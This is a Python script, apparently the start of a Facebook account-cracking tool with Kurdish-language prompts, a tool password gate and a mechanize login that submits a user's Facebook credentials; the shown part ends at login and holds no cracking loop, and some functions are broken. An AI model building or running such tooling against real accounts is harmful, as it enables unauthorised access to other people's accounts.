#coding=utf-8

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,http.cookiejar,requests,mechanize,importlib
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


importlib.reload(sys)
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android_gi; Opera Mini/32.0.2254/85. U; id_gi) Presto/2.12.423 Version/12.16')]


def keluar():
    print("\033[1;96m[!] \x1b[1;91mGaranawa")
    os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')
 
 
def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(00000.1)
 
 
#### LOGO ####
logo = """
\033[1;35;40mY88b      / 888~~  888~-_   ~~888~~ 888~~  Y88b    /
 Y88b    /  888    888   \     888    888     Y88b  /  
  Y88b  /   888___ 888    |    888    888___   Y88b/  
   Y888/    888    888   /     888    888      /Y88b  
    Y8/     888    888_-~      888    888     /  Y88b  
     Y      888___ 888 ~-_     888    888___ /    Y88b
                                                                                                                                                                                               
\033[0;39m╔▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬╗
\033[0;39m║\033[1;36m* \033[0;36mTelegram \033[1;36m: \033[1;36m@ShadowKU\033[0;31m                      ║
\033[0;39m║\033[1;33m* \033[0;33mGitHub  \033[1;33m : \033[1;33m\033[4mhttps://Github.com/ShadowKU\033[0m \033[0;31m   ║
\033[0;39m║\033[1;36m* \033[0;31mYoutube \033[1;31m : \033[1;31mVertex\033[0;31m                         ║
\033[0;34m╚▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬╝
"""
 
def tik():
    titik = ['.   ','..  ','... ']
    for o in titik:
        print("\r\033[1;96m[●] \x1b[1;93mLogging In \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
berhasil = []
cekpoint = []
oks = []
id_gi = []
listgrup = []
vulnot = "\033[31mbardast nya"
vuln = "\033[32mbardasta"
 
os.system("clear")
print("\x1b[1;31m⚔═══════════════════════════☠\x1b[1;93m═══════════════════════════⚔")
print("""\x1b[0;31m  \033[1;96m            \x1b[1;93m[¤] \033[0;96mTelegram : \033[1;96m@ShadowKU\x1b[1;96m  
\033[1;93m \x1b[1;96m               \x1b[1;93m[¤] \x1b[0;31mYoutube : \x1b[1;31mVertex\x1b[1;96m  
\033[1;93m \x1b[1;96m       \x1b[1;93m[¤] \x1b[1;31m⚠ barprsyar nem la hech keshayak ⚠\x1b[0;31m""")
print(" \x1b[1;93m⚔══════════════════════════☠\x1b[1;31m═══════════════════════════⚔")
 
CorrectUsername = "Ver"
CorrectPassword = "Tex"
 
loop = 'true'
while (loop == 'true'):
    username = input("\033[1;96m[\x1b[1;93m☆\x1b[1;96m] \x1b[1;31mUsernamey Toolaka \x1b[1;93m>\x1b[1;96m>\x1b[1;93m>\x1b[1;96m>\033[1;35;40m ")
    if (username == CorrectUsername):
        password = input("\033[1;96m[\x1b[1;93m☆\x1b[1;96m] \x1b[1;31mPassworde Toolaka \x1b[1;93m>\x1b[1;96m>\x1b[1;93m>\x1b[1;96m>\033[1;35;40m ")
        if (password == CorrectPassword):
            print("Tawawa ✅" + username)
            loop = 'false'
        else:
            print("Passwordaka Halaya")
            
    else:
        print("Usarnameaka Halaya")
        
 
def login():
    os.system('clear')
    try:
        toket = open('login.txt','r')
        menu()
    except (KeyError,IOError):
        os.system('clear')
        print(logo)
        print(42*"\033[1;96m=")
        print('\033[1;96m[☆] \x1b[1;91mFacebookek Daxel Bka \x1b[1;96m[☆]' )
        id_gi = input('\033[1;96m[+] \x1b[0;34mid_gi/Email \x1b[1;91m: \x1b[1;92m')
        pwd = input('\033[1;96m[+] \x1b[0;34mPassword \x1b[1;91m: \x1b[1;92m')
        tik()
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print("\n\033[1;96m[!] \x1b[1;91mEmail Yan Passwordakat Halaya")
            keluar()
        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id_gi
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
